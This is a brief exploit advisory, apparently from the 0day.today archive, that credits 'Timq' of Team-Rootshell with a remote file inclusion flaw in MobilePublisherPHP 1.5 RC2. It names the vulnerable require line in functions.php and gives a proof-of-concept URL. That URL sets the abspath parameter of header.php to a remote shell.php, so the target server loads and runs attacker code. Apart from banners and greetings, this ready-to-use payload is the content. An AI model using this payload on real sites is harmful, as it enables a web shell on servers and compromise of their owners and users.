id: 848
date: 09/16/2006
title: MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability
author: Timq
cves: 

===============================================================
MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability
===============================================================


MobilePublisherPHP 1.5 RC2 (functions.php)Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org

Team-Rootshell
##################################################################

http://www.securitydb.org

Team-Rootshell
##################################################################

Vulnerable: require $abspath."/functions.php";

###################################################################

Exploit PoC:

http://site.com/[dir]/header.php?abspath=http://site.com/shell.php?


####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,Cm2,Splinter,InTel,Preddy,Ice,ErazerZ,Maggot
PunKerX,Pepin,Ender


#####################################################################


#  0day.today [2023-03-24]  #